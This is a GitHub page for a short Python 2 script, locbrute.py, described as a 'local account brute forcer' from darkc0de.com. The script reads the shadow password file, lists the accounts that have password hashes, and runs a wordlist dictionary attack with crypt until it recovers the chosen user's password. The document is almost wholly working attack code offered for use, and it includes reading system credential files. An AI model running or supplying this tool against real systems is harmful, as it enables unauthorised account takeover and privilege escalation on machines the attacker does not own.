-
Notifications
You must be signed in to change notification settings - Fork 120
/
Copy pathlocbrute.py
46 lines (33 loc) · 949 Bytes
/
locbrute.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#!/usr/bin/python
#Local account brute forcer.
#(You need to be able to read shadow file)
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import sys, crypt, spwd
if len(sys.argv) != 3:
print "\nUsage: ./locbrute.py <user> <wordlist>"
print "Ex: ./locbrute.py root words.txt\n"
sys.exit(1)
print "\nAccounts with encrypted passwords:\n"
users = spwd.getspall()
for user in users:
if user[1] not in ["*","!"]:
print user[:2]
try:
words = open(sys.argv[2], "r").readlines()
except(IOError):
print "\n[-] Error: Couldn't open wordlist\n"
sys.exit(1)
print "\n[+] Words Loaded:",len(words)
try:
passwd = spwd.getspnam(sys.argv[1])[1]
except(KeyError):
print "\n[-] User not found. Check list above\n"
sys.exit(1)
print "[+] Cracking:",passwd
for word in words:
word = word.replace("\n","")
if crypt.crypt(word, passwd) == passwd:
print "\n[!] Cracked: [ ",word," ]\n"
sys.exit(1)
print "\n[-] Couldn't find match\n"